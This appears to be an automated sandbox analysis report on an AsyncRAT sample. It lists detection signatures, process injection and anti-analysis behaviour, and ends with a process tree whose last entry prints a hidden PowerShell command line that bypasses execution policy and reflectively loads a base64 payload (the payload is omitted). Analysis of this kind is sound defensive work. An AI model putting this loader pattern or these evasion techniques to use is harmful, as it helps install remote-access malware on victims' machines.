Windows
Analysis Report
bad.txt
Overview
General Information
Detection
AsyncRAT
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Yara detected AsyncRAT
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Base64 MZ Header In CommandLine
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64_ra
- notepad.exe (PID: 6984 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\bad.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cmd.exe (PID: 1364 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\bad.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5508 cmdline:
"powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('[base64-encoded PE payload omitted]